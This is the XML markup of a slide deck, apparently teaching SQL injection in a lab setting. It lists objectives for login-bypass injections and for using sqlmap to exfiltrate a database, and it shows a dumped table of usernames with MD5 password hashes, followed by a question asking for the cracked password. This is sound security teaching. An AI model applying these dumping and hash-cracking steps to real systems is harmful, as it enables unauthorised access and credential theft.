                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>admin   | 5f4dcc3b5aa765d61d8327deb882cf99 </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>gordonb | e99a18c428cb38d5f260853678922e03 </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>1337    | 8d3533d75ae2c3966d7e0d4fcc69216b </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="145000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>smithy  | 5f4dcc3b5aa765d61d8327deb882cf99</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1526" name="Google Shape;1526;p117"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="187" y="2979200"/>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What is the password associated with the hash you dumped? </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1527" name="Google Shape;1527;p117"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="88" y="3123300"/>
            <a:ext cx="9144000" cy="697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t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1528" name="Google Shape;1528;p117"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3344000"/>
            <a:ext cx="9144000" cy="14250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t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>admin   | 5f4dcc3b5aa765d61d8327deb882cf99 </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>gordonb | e99a18c428cb38d5f260853678922e03 </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>1337    | 8d3533d75ae2c3966d7e0d4fcc69216b </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>smithy  | 5f4dcc3b5aa765d61d8327deb882cf99</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="120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sz="1200">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="80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2" name="Shape 1532"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1533" name="Google Shape;1533;p11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Today’s Objectives</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1534" name="Google Shape;1534;p11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the end of class, you will be able to:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1535" name="Google Shape;1535;p11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36" name="Google Shape;1536;p118"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1284250"/>
            <a:ext cx="9144000" cy="3622200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Identify potential SQL injection points.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Manually craft and deliver login bypass injections. </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use sqlmap to exfiltrate the contents of a vulnerable database. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1537" name="Google Shape;1537;p118"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513375" y="1326248"/>
            <a:ext cx="230700" cy="2268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18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513375" y="1704023"/>
            <a:ext cx="230700" cy="2268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18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513375" y="2123811"/>
            <a:ext cx="230700" cy="2268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0" name="Shape 1070"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1071" name="Google Shape;1071;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Warm Up Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1072" name="Google Shape;1072;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="9144000" cy="344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24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>1. Select all users whose last name is </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>Doe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1073" name="Google Shape;1073;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="477750" y="1211150"/>
            <a:ext cx="7583100" cy="1367400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>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t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>SELECT * FROM site_data.users WHERE last='Doe'</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1074" name="Google Shape;1074;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2734985"/>
            <a:ext cx="9144000" cy="1139400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The first query retrieves the record for </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>Jane</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
